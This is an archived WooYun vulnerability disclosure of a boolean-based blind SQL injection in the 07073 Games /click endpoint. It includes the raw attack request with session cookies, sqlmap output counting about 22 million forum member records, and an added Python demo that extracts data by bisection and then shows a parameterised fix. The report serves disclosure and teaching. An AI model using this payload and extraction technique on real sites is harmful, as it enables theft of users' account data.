WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-03-19: Details reported to the vendor, awaiting vendor handling
2015-03-19: Vendor confirmed; details disclosed to the vendor only
2015-03-29: Details disclosed to core white hats and relevant domain experts
2015-04-08: Details disclosed to regular white hats
2015-04-18: Details disclosed to intern white hats
2015-05-03: Details disclosed to the public
SQL injection on a 07073 Games site, fourth time, affecting 22,044,669 users' data

Sorry, it's me again. But look at it the other way: it is far better that I report the problem than that someone else drags the database off. I never pull anyone's pants down [dump their data], and I don't snoop around. A good socialist youth.
company.07073.com
POST /click HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://company.07073.com
Referer: http://company.07073.com/8729.html
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
Host: company.07073.com
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22e901c1f669d2d643c4ee936468d6509c%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22125.78.248.83%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Windows+NT+6.3%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F33.0.1750.170+Safari%2F537.36+%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1426734513%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D30bfde05526ae61ba411a0babcd6cadf; CNZZDATA30095910=cnzz_eid%3D1437763485-1426487774-http%253A%252F%252Fwww.07073.com%252F%26ntime%3D1426725501; CNZZDATA30078424=cnzz_eid%3D1529681690-1426490357-http%253A%252F%252Fwww.07073.com%252F%26ntime%3D1426729241; DedeUserID=22166706; DedeUserID__ckMd5=195d5f4d055945af; DedeUsername=bma123; DedeUsername__ckMd5=ed597bcceffae423; loginState=1; loginName=bma123; www07073=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22b2315a9a9db5140b17c8b734a0bfde8e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22183.57.47.59%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A72%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+rv%3A36.0%29+Gecko%2F20100101+Firefox%2F36.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1426729229%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Dcdfc00377f4a29347793a5622bcc27e9; PHPSESSID=98946e97e1d599248d8ec8b875b9a45e; from_url=http%3A//v.07073.com/
Accept-Encoding: gzip, deflate
Content-Length: 19
Content-Type: application/x-www-form-urlencoded

cid=1
current user: 'amdbuser@%'
current database: 'kf07073'
[11:46:05] [INFO] testing connection to the target URL
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] y
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: cid (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cid=1 AND 5900=5900
---
[11:46:07] [INFO] testing MySQL
[11:46:07] [INFO] confirming MySQL
[11:46:07] [INFO] the back-end DBMS is MySQL
web server operating system: Windows NT 4.0
back-end DBMS: MySQL >= 5.0.0
[11:46:07] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:46:07] [INFO] retrieved: 22044669
Database: bbs073
+------------+----------+
| Table      | Entries  |
+------------+----------+
| uc_members | 22044669 |
+------------+----------+
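Two things in the sqlmap output above are worth spelling out. First, the injection is boolean-based blind: the only signal the attacker gets is whether `cid=1 AND 5900=5900` and `cid=1 AND 5900=5901` produce different responses, and sqlmap then recovers values such as the row count (the `retrieved: 22044669` line) one bit per request by bisection. Second, the application's current database is `kf07073`, yet the table that was counted lives in `bbs073`; the database account `amdbuser@%` can read across databases, so an injection in the company site's `/click` endpoint reaches the forum's `uc_members` table. The following is an added example, not code from this report or from 07073. It reconstructs the bug against a constructed in-memory SQLite database (the real backend was MySQL; SQLite is used so it runs offline), shows the true/false probe sqlmap used, recovers an integer and a string through the blind oracle, and puts the parameterised fix beside the vulnerable handler. All names (`click_vulnerable`, `click_fixed`, `blind_int`, `blind_string`, the `clicks` table, the three `uc_members` rows) are assumptions made for the example.

```python
"""Boolean-based blind SQL injection, modelled on the /click cid finding.

Added example with a constructed in-memory SQLite stand-in; not 07073's code.
"""
import sqlite3


def make_db():
    """Constructed stand-in for the backend: a 'clicks' table that the /click
    handler reads, plus a tiny uc_members table (3 rows, not 22,044,669)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE clicks (cid INTEGER PRIMARY KEY, game TEXT);
        INSERT INTO clicks VALUES (1, 'demo-game');
        CREATE TABLE uc_members (uid INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO uc_members VALUES (1, 'alice', 'hash-1');
        INSERT INTO uc_members VALUES (2, 'bob',   'hash-2');
        INSERT INTO uc_members VALUES (3, 'carol', 'hash-3');
    """)
    return conn


def click_vulnerable(conn, cid):
    """Hypothetical reconstruction of the bug: the POST parameter cid is
    concatenated into the SQL text. Returns True when a row matched; that
    true/false difference in the response is all a blind attacker needs."""
    sql = "SELECT game FROM clicks WHERE cid = " + cid
    return conn.execute(sql).fetchone() is not None


def click_fixed(conn, cid):
    """Hardened handler: validate the type, then bind the value as a query
    parameter so it can never be parsed as SQL syntax."""
    try:
        cid_int = int(cid)
    except ValueError:
        return False
    sql = "SELECT game FROM clicks WHERE cid = ?"
    return conn.execute(sql, (cid_int,)).fetchone() is not None


def is_injectable(handler):
    """sqlmap's boolean-based test from the report: append a true and a false
    tautology to cid and check whether the responses differ."""
    return handler("1 AND 5900=5900") != handler("1 AND 5900=5901")


def blind_int(oracle, expr, hi=1 << 31):
    """Recover an integer-valued SQL expression one bit per request by
    bisection over [0, hi], the same strategy sqlmap uses for blind inference."""
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"1 AND ({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_string(oracle, subquery):
    """Recover a string: its length first, then each character by code point
    (ASCII assumed). SQLite spellings; on MySQL use ascii(substring(...))."""
    length = blind_int(oracle, f"length(({subquery}))", hi=4096)
    chars = []
    for i in range(1, length + 1):
        code = blind_int(oracle, f"unicode(substr(({subquery}), {i}, 1))", hi=0x7F)
        chars.append(chr(code))
    return "".join(chars)


def run_demo():
    conn = make_db()
    oracle = lambda cid: click_vulnerable(conn, cid)
    return {
        "vulnerable_injectable": is_injectable(lambda cid: click_vulnerable(conn, cid)),
        "fixed_injectable": is_injectable(lambda cid: click_fixed(conn, cid)),
        # The blind equivalent of sqlmap's '[INFO] retrieved: 22044669' count.
        "member_count": blind_int(oracle, "SELECT COUNT(*) FROM uc_members"),
        "first_username": blind_string(oracle, "SELECT username FROM uc_members WHERE uid = 1"),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Against the vulnerable handler the two probes disagree, the row count comes back after about 31 requests and `alice` after a few dozen more; against `click_fixed` both probes return False, so there is nothing to bisect. The fix is the parameter binding, not the `int()` check alone: binding is what keeps a value from becoming syntax for every parameter, including string ones where no type check applies.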
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-03-19 13:15
Thank you for providing the vulnerability information
None yet